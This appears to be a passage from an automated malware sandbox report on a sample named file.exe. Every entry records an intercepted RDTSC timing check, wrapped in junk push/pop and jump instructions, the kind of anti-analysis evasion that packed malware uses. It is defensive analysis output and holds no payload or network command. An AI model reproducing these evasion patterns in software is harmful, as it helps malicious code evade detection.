    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2F6D second address: 3F2F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2F7A second address: 3F2F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F320C second address: 3F3210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3210 second address: 3F323C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2FF4F87607h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F65A0 second address: 3F65C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2FF4BC0FC7h 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F65C6 second address: 3F65D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2FF4F875F6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F65D4 second address: 3F65DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5DD6 second address: 3F5E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87602h 0x00000007 pushad 0x00000008 jmp 00007F2FF4F875FDh 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F2FF4F875F6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5E0A second address: 3F5E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5E0E second address: 3F5E1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5E1C second address: 3F5E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5FC7 second address: 3F5FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5FCB second address: 3F5FF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F2FF4BC0FD2h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB21C second address: 3FB222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB222 second address: 3FB233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F2FF4BC0FB6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB233 second address: 3FB238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB238 second address: 3FB23D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB506 second address: 3FB51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007F2FF4F875FDh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB51E second address: 3FB53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4BC0FC8h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB53A second address: 3FB540 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBA5A second address: 3FBA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F2FF4BC0FC0h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F2FF4BC0FB6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FBA8F second address: 3FBA95 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC428 second address: 3FC439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4BC0FBBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC439 second address: 3FC43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC43E second address: 3FC443 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35C9F5 second address: 35C9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402CB4 second address: 402CC4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F2FF4BC0FDFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402CC4 second address: 402CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402CCA second address: 402CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402E13 second address: 402E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402E17 second address: 402E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4043A1 second address: 4043A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4043A7 second address: 4043AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4043AC second address: 4043CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87608h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4043CA second address: 4043DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2FF4BC0FBDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4046E4 second address: 4046F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4046F4 second address: 4046FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4094A9 second address: 4094AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4094AD second address: 4094B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4085CE second address: 408639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2FF4F87609h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F2FF4F875F8h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jmp 00007F2FF4F87604h 0x0000001a jmp 00007F2FF4F87607h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2FF4F875FFh 0x00000026 jo 00007F2FF4F875F6h 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408D53 second address: 408D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4BC0FBFh 0x00000009 jl 00007F2FF4BC0FBAh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408F07 second address: 408F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87608h 0x00000009 jmp 00007F2FF4F87603h 0x0000000e popad 0x0000000f pop edx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409073 second address: 40907C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40907C second address: 40909F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87607h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 417D04 second address: 417D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41614C second address: 41616C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2FF4F87605h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41657E second address: 416583 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416583 second address: 416592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jbe 00007F2FF4F875FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416D79 second address: 416D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416D83 second address: 416D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41EC31 second address: 41EC4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41EC4C second address: 41EC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41EC50 second address: 41EC6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FBDh 0x00000007 jne 00007F2FF4BC0FB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41EC6F second address: 41EC75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41EC75 second address: 41EC8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2FF4BC0FBBh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jbe 00007F2FF4BC0FB6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E91C second address: 41E920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E920 second address: 41E93C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2FF4BC0FBEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E93C second address: 41E955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87604h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E955 second address: 41E970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4BC0FC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E970 second address: 41E974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43EBE5 second address: 43EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43EBE9 second address: 43EC1F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2FF4F875F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F2FF4F87601h 0x00000010 jmp 00007F2FF4F875FBh 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2FF4F87607h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43EC1F second address: 43EC44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2FF4BC0FC0h 0x0000000c jmp 00007F2FF4BC0FBAh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441388 second address: 44138C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44138C second address: 4413B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2FF4BC0FC7h 0x0000000b pop edi 0x0000000c jbe 00007F2FF4BC0FD9h 0x00000012 pushad 0x00000013 jl 00007F2FF4BC0FB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443B36 second address: 443B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2FF4F875F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BA84 second address: 44BA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BD5B second address: 44BD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jmp 00007F2FF4F875FAh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C3DD second address: 44C3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C3E7 second address: 44C417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F875FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2FF4F87606h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44CDFE second address: 44CE2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC0h 0x00000007 jmp 00007F2FF4BC0FC8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44CE2F second address: 44CE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87609h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45066E second address: 450672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45FDC6 second address: 45FDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45FDCA second address: 45FDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45FDD0 second address: 45FDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F2FF4F875FCh 0x0000000d jns 00007F2FF4F875FEh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45FDF5 second address: 45FE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2FF4BC0FB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F2FF4BC0FB6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45FE0A second address: 45FE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46BEFD second address: 46BF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46BF06 second address: 46BF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4857E7 second address: 48580E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2FF4BC0FBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2FF4BC0FC5h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48498C second address: 4849A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2FF4F875F6h 0x0000000a jmp 00007F2FF4F87601h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4849A7 second address: 4849BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F2FF4BC0FB6h 0x0000000f jp 00007F2FF4BC0FB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850A0 second address: 4850A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850A5 second address: 4850AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485384 second address: 485389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485389 second address: 485393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2FF4BC0FB6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486D88 second address: 486D99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F2FF4F875F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48836F second address: 488377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488377 second address: 48837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48837C second address: 4883A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 ja 00007F2FF4BC0FCDh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4883A8 second address: 4883CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F87608h 0x00000009 jo 00007F2FF4F875F6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4883CD second address: 4883D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACC0 second address: 48ACC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACC9 second address: 48ACCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B018 second address: 48B033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F2FF4F875FAh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
